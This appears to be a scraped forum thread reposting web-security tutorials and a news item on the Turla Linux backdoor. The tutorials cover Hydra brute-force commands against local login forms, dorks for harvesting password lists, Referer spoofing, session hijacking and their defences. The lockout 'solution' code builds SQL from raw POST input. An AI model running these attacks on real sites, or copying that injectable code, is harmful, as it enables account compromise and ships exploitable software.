from “users” are stored, then access it. If you upload a .doc file to test this out, in the main page of the directory – it won’t leave your computer. Exercise 2: Populating a Dictionary To populate a dictionary, we will be using John the Ripper. Open the PopulatingDictionary folder. You can populate a dictionary in John the Ripper and cut the output size by knowing the type of password (its maximum length, whether it should be only digits, contain special characters, etc.). To create a simple dictionary and save it to a file, you can browse to the directory of the john the ripper installation in CMD and use: john-mmx –incremental=alpha –stdout > filename whereas filename is the name and location of the file in which the words should be saved to. There are various options in the incremental mode, such as Digit (only digits), Lanman (letters, numbers and some special characters), Alpha (only letters) and All (all characters). Thus, you can also use john-mmx –incremental=lanman –stdout > wordlist.txt, etc. Be aware that the size of the text file would probably get really big in just a couple of seconds, depending on your machine’s abilities. Exercise 3: Acquiring user and password list for dictionary attacks Querying Google for passwords and user lists is usually pretty straightforward. You use something like filetype:lst password for passwords and filetype:lst user for username lists. We have included a sample username list and a password list downloaded from the Internet along with the attachment files to this article. Exercise 4: Breaking HTTPAuth For this exercise, we will be using Hydra and the user/pass lists included in the attachment files. When calling Hydra ($ hydra.exe) the parameter –L usrlistpath serves the purpose of supplying the program a path to a username list file whose usernames will be tested along with all the passwords until a match is found. –l username gives Hydra a single username, which option can be used if you know the username you are trying to break into but do not know the particular password. -P loads a password list while –p loads a single password. Next, you specify the host to attack (localhost or 127.0.0.1) followed by http-get (request a directory/page), followed by the path to the particular directory or file you are trying to access (path excluding the host which is already given). It will most likely look something like this: hydra.exe -L HD:/WebsiteHacking/FormCracking/usrnames.txt -P HD:/WebsiteHacking/FormCracking/passwords.txt localhost http-get /HTTPSecurity/ Figure 1: the HTTPAuth seeking credentials. Get them! To establish a simple HTTPAuth mechanism yourself, you need to create your password by browsing to htpasswd.exe in your Apache bin folder, starting it in Command Prompt, and creating it. You can move the user account list file to any directory you want and start the mechanism by editing your .htaccess file: AuthType Basic AuthName "Admin Area" AuthUserFile pathauthorized.htpasswd Require user … You can select only particular users to be able to access the page, and you can set different username lists for different parts of the website, but this mechanism for protection remains basic. To test cracking the example from the files, change the path of AuthUserFile to the current location of the HTTPSecurity directory. Exercise 5: Breaking a POST login form The password and usernames list are in the FormCracking folder. They have not been changed, but the correct login credentials are easy enough. The following statement might work: hydra –L path/FormCracking/usrnames.txt -P path/FormCracking/passwords.txt 127.0.0.1 http-post-form “/FormCracking/index.php:username=^USER^&passwd=^PASS^:Oops” The difference between this statement and when we cracked the HTTPAuth mechanism is that here we include the parameters that the form sends to the server-side script, in this case username and password. Those are the “name” attributes of the relevant input tags that we want to test. Figure 3: modifying the values of hidden inputs. It might seem weird at first, but many sites actually have hidden inputs in which they store important data. An example is PayPal shopping carts on third-party websites where you can change fields such as name of the product directly by changing the value of a hidden input. There are some outdated shopping carts which still use price as a hidden input which means that if you don’t use their API and verify the amount that was paid to you through a server-side script – the user can easily pay as much as he wants for the product! Figure 4: an example of a shopping cart which sets the price of the item on the client-side. Figure 5: changing the name of the product in stores using PayPal as a payment method can still do some harm. 2nd possibility: Setting a loggedin GET request, that’s probably not something you would meet somewhere today though. 3rd possibility, members2.php: Install and start Tamper Data with alt+T when the page is opened. Add a new Header… Called Referer and with value the path to login.php, it would look like you were redirected from login.php. There are developers out there who think HTTP_REFERER proves that the user is legitimate despite that it’s just a header sent through HTTP requests, and this is a point of exploitation in some sites even today. Exercise 7: Exploiting Account Lockout If you have a simple lockout mechanism like this (PHP/MySQL (AccountLockout1 folder)): // Connecting to the MySQL database mysql_connect("localhost", "root", "") or die(mysql_error()); mysql_select_db("userdb") or die(mysql_error()); // Loading the current number of attempts that the user have used $attempts = mysql_fetch_array(mysql_query("SELECT attempts FROM users WHERE username = '" . $_POST['username'] . "'"))[0]; //If the login credentials are incorrect – add 1 to attempts variable else if ($_POST['pass'] != $info['password']) { $attempts +=1; echo "This is your " . $attempts . " attempt! "; //Stop the rest of the code from executing if the user have attempted to login with incorrect details at least three times if ($attempts > 2) { die("</pre> <h1>This account is locked. Contact the administrator at sysadmin@samplesite.com</h1> <pre> "); } // Update the attempts column of the particular user in the database mysql_query("UPDATE users SET attempts=" . $attempts . " WHERE username = '" . $_POST['username'] . "'"); If we have such a login form and we are relying on a plugin from WordPress or Joomla and we are not aware of that – then malicious people can block an account just by knowing the username. In many sites, the username is readily available such as in comments to articles, message boards, social media likes, etc. A solution is both to block only the offending IP address and to provide the block only for a limited duration. A sample solution of adding a duration for the account lockout In PHP/MySQL could look something like this: //folder AccountLockout2 // Inject SQL code CREATE TABLE users( ID MEDIUMINT NOT NULL AUTO_INCREMENT PRIMARY KEY , username VARCHAR( 60 ) , passwordVARCHAR( 60 ) , attempts TINYINT, time TINYINT) Adding a user to the database could look like: $insert = "INSERT INTO users (username, password, attempts, time) VALUES ('".$_POST['username']."', '".$_POST['pass']."', '" . "0'" . " , '-1'" . ")"; We use the number -1 to indicate that there is no lockout. Then we change a bit the old code: if ($attempts > 2) { // If there no lockout, create one and notify when the account is going to be active if ($info["time"] == "-1" ) { $expectedRelease = date("H") + 1; mysql_query("UPDATE users SET time=" . date("H") . " WHERE username = '" . $_POST['username'] . "'"); die("</pre> <h1>This account is locked. Contact the administrator at sysadmin@samplesite.com" . ". It is going to be active at: ". $expectedRelease . " o' clock</h1> <pre> "); } // Otherwise, remove lockout else if ($info["time"] != -1 && date("H") > intval($info["time"])) { mysql_query("UPDATE users SET time='-1' WHERE username = '" . $_POST['username'] . "'"); $attempts = 0; } else { //If the account already has locked out and one hour has not passed, just say it is locked and quit die("</pre> <h1>This account is locked. Contact the administrator at sysadmin@samplesite.com</h1> <pre> "); } This simple script will lockout the account after 3 attempts for different periods of time – until a full hour has passed since the lockout. It can be found in the AccLockoutDuration folder. It is yet even better to create an IP ban and implement a better version of the above script as it serves demonstrative purposes only. Exercise 8: yet to come… Conclusion We have barely covered the topic of website hacking and web security, as this is a vast field to touch upon. Yet, I hope future articles would reveal more and more of this field, as the leakage of data could not only harm the reputation of your business, the trust of your clients, the well-being of clients, but also can put you in front of serious legal proceedings. Source
  24. Introduction In this part of the Website Hacking series we are going to take a look at how to minimize damages from XSS attacks considering our web application can at some point become vulnerable to this type of attacks (HttpOnly cookies are going to be discussed). We are going to look at a mechanism for bypassing the security that HttpOnly cookies provide known as Cross Site Tracing attack. We are also going to give a brief example of packet sniffing, followed by a more lengthy discussion on session hijacking and session fixation. Fill out the form below to download the code associated with this article. Each code piece that needs to be inserted in the article is linked to to one of the files with the following syntax: Code.php SNIPPET 5 or Code2.php SNIPPET 7 where the first value is the file in which the code piece is located and the second is the particular code piece that has to be inserted. Inside the code files there are comments showing when each snippet starts and when it ends. Minimizing damages from XSS (HTTPOnly Cookies) If your site at some point becomes vulnerable to XSS, you probably know that your cookies would be exposed. The attacker can simply save document.cookie’s value somewhere and use it for malicious purposes – for example – he can try to steal your session by looking for a session identifier in your cookies. As you know, the main difference between cookies and sessions is that cookies are stored locally on the user’s machine, and sessions are stored in the server (usually the tmp folder, which has to be ensured is out of the public folder and out of reach for regular users). However, the way sessions work is that they save an ID which links the user with the particular session stored on the server, and this session ID (known as magic cookies or session keys) can be stored and passed to the server in a cookie. Here is one way to make sure that if somebody could get the document.cookie from your users, he does not get all the cookies you have stored for that user. Read the following setcookie description below (as taken from php.net) bool setcookie ( string $name [, string $value [, int $expire = 0 [, string $path [, string $domain [, bool $secure = false [, bool $httponly = false ]]]]]] ) A way to ensure that if an unauthorized person can execute JavaScript on clients he would not get the cookie is to set the last parameter ($httponly) to true. This will disallow JavaScript from reading the cookie that you are setting. A sample cookie would look something like that: code.php SNIPPET 1 Then you can easily access it with PHP with something like that: Code.php SNIPPPET 2 Even better, there is a way to make sure all your cookies are HTTPOnly: You can set in your php.ini file session.cookie_httponly to 1 or force HTTPOnly cookies only for particular pages/scripts on your website by adding: Code.php SNIPPET 3 in the page’s header. Another way to add an HTTPOnly cookie (a more low-level one) is to set the header yourself: Code.php SNIPPET 4 HTTPOnly Cookies circumvention and prevention (XST) We have seen that HTTPOnly cookies disallow access to the cookies from JavaScript. However, a technique was crafted to circumvent this protection. It is known as XST or Cross Site Tracing Attack. The attacker could target old browsers and type something similar to: Code.php SNIPPET 5 After which the variable traceData would contain the cookies he desires as well as other data about the request. However, in contemporary browsers the TRACE request method is disabled for AJAX requests by default (throws a security error). Similar AJAX XST attempts should not work on clients having Firefox 19.0.2+ or Chrome 25.0.1364.172+ Thus, it may still be useful to block Trace requests. To disable it natively, Apache’s httpd.conf must be opened and the following line added to it: TraceEnable off This would work on versions of Apache > 1.3.34 or 2.0.55+ for apache2. Another way to disable TRACE methods without changing the htpd.conf file is changing the .htaccess file and adding: Disable_trace.txt Note: mod_rewrite has to be enabled for the snippet to work. Packet sniffing There are many sites out there whose client credentials are vulnerable when it comes to man-in-the-middle attacks. When connected to a public Wi-Fi, there could easily be someone at that restaurant sniffing the incoming traffic. Here is a sample using Wireshark: Firstly, we have applied an HTTP filter to only see HTTP requests. Then we use Ctrl+F, search for a String and enter “POST” for value to only see the POST requests (in most cases, those contain user-entered data and frequently interesting ones). Here we see a sample of unencrypted client/server communication after a registration form has been submitted. A fix for that is using HTTPS (TLS/SSL). Session hijacking/Session fixation Assuming another vulnerability is present (such as XSS), an attacker can see users’ cookies, then he can see which one is the session ID (by default in Apache servers the session id is carried in a cookie called PHPSESSID and hijack an active session. Below we have provided an explanation of how that could happen. Assume we have this login script and login form on the same file (in a real application the accounts would be populated from a database). We can see that in the upper left corner there is a paragraph with the text “User appears NOT logged in” before the user has been logged in. Note: we have enhanced the form visually a bit with Bootstrap 3. The code is as follows: Code.php SNIPPET 6 We do not implement an actual attack but check our session ID cookie: Then we open the page in a browser that does not have any active sessions, start Tamper Data and submit the form with wrong credentials, but use the session ID of the actual logged in user. The result is: we have hijacked the session of a legitimate user and appear logged in. (We do not get redirected, but as you can see we are logged in and there’s no wrong credentials statement appearing). Actually, as you can see we are not redirected to the memberzone, so the code inside the $pass) conditional does not execute, but if we have code executed in another block, which depends on the user being logged in or similar, then the attacker would have been able to run the code inside it and do whatever he wants with the user’s account. The first and more ineffective way of protecting against such attacks is to set session.referer_check = yourDomainHere in php.ini or use ini_set to set it for a particular script. In that way, the session would be set only if the set domain/path is the referrer (equivalent to $_SERVER['HTTP_REFERER'] regular expression search in a sense and not a very effective method). Plus, it does not accept multiple parameters. Multiple parameters are supported in some frameworks such as CakePHP. What you should do is protect yourself against XSS attacks, as these can leak the session ID and lead to session hijacking. You should also use httpOnly cookies to revoke JavaScript access to your cookies, possibly minimizing damages from XSS and not leaking users’ cookies. Another thing you can do is to check if the IP address of the person who first logged in and the IP address of the person using the session are the same (they are expected to be the same). Firstly, we make the following changes (check if there was a session hijacking attempt, say to the user that he has been reported and send an email): Code2.php SNIPPET 7 In our loop that checks whether some of the credentials match, we have to also log the IP address of the person at the moment of logging him in. Code2.php SNIPPET 8 And we modify the section when we show content only for logged in users to something like: Code2.php SNIPPET 9 We have logged in with Chrome as Kenny. We use a different IP address and try to steal the session with the session ID cookie credentials using Tamper Data. We get the following page: User appears NOT logged in (we have not fooled the script) and a notification that the breach was found is displayed on the screen. And if we look at our email client, we will get a message resembling this but with the full IP address of the attacker written in the email’s contents: Session fixation is different from session hijacking because in session hijacking the attacker could intercept or hijack the session’s cookie, but in session fixation the attacker supplies the user with a session ID that is already set, and when that user logs in the server would assign his data into the session ID that is set by the attacker, which would grant him access to the user’s session. To prevent session fixation, one way is to check the referrer (we have mentioned that before). Another way is to reduce the duration for which sessions are active from another php.ini setting (session.cache_expire). However, what we recommend is that you regenerate session IDs frequently. Assigning a new session ID will ensure that the ID that a possible attacker has obtained would not be useful, because a new session ID would have been assigned to the user. We can achieve that with the following snippet: Code3.php SNIPPET 10 Conclusion In this article, we have examined some common exploits out there, and we hope that you will start implementing some of these security mechanisms in your future projects, if you are not implementing them already. Sources: MDLog:/sysadmin, “Apache Tips: Disable the HTTP TRACE Method”, Accessed 3/12/2014, Available at: Apache Tips: Disable the HTTP TRACE method - MDLog:/sysadmin OWASP, “Cross Site Tracing”, Accessed 4/12/2014, Available at: https://www.owasp.org/index.php/Cross_Site_Tracing Stack Overflow, ‘What is PHP’s session.referer_check protecting me from?’, Accessed 5/12/2014, Available at: security - What is PHP's session.referer_check protecting me from? - Stack Overflow Source
  25. The Turla APT campaigns have a broader reach than initially anticipated after the recent discovery of two modules built to infect servers running Linux. Until now, every Turla sample in captivity was designed for either 32- or 64-bit Windows systems, but researchers at Kaspersky Lab have discovered otherwise. “The attack tool takes us further into the set alongside the Snake rootkit and components first associated with this actor a couple years ago,” wrote Kurt Baumgartner and Costin Raiu, researchers with Kasperky’s Global Research and Analysis Team. “We suspect that this component was running for years at a victim site, but do not have concrete data to support that statement just yet.” Like its Windows brethren, this version of Turla is a backdoor used to open communication to a command and control server—Kaspersky said it has sink-holed one such domain, which is based on UDP packets, used by one of the Linux modules—for file exfiltration, remote management and remote code execution. Turla has been used in espionage campaigns against municipal governments, embassies, militaries and other industrial targets, primarily in the Middle East and Europe. In August, another component to these stealthy attacks called Epic Turla was disclosed; Epic is a multistage attack in which victims are compromised via spearphishing emails and other social engineering scams, or watering hole attacks. The Epic Turla campaigns combined commodity exploits with zero-day attacks against Windows XP and Windows Server 2003 machines, as well as an Adobe Reader zero day. The Epic Turla campaigns combined commodity exploits with zero-day attacks against Windows XP and Windows Server 2003 machines, as well as an Adobe Reader zero day have been used to elevate an attacker’s privileges on the underlying system. More than 100 websites were reported to be infected in Epic Turla attacks, including the website for City Hall in Pinor, Spain, an entrepreneurial site in Romania and the Palestinian Authority Ministry of Foreign Affairs. All of the sites were built using the TYPO3 content management system, indicating the attackers had access to a vulnerability on that platform. Once compromised, the websites then loaded remote JavaScript that performs a number of tasks, including dropping exploits for flaws in Internet Explorer 6-8, recent Java or Flash bugs, or a phony Microsoft Security Essentials application signed with a legitimate certificate from Sysprint AG. Kaspersky’s Raiu and Baumgartner said most of the code in the Linux version of Turla comes from public sources. The backdoor, for example, is based on cd00r, Baumgartner and Raiu wrote. It includes an ELF executable that is statically linked against the GNU C library, an older version of OpenSSL and libpcap, the tcpdump network capture library. The use of the cd00r backdoor enables the attack to go undetected, researchers said, because it does not require elevated privileges while running remote commands. Turla was uncovered early this year and researchers also found a connection to the Agent.btz worm which infected U.S. military networks and led to a government mandate banning the use of USB drives. While Agent.btz and Turla share characteristics, no one has linked the authors. Turla uses the same XOR key and log file names as Agent.btz, for example. Kaspersky’s Baumgartner and Raiu said that Linux variants were known to exist, but this is the first sample caught in the wild. Source
×
×
  • Create New...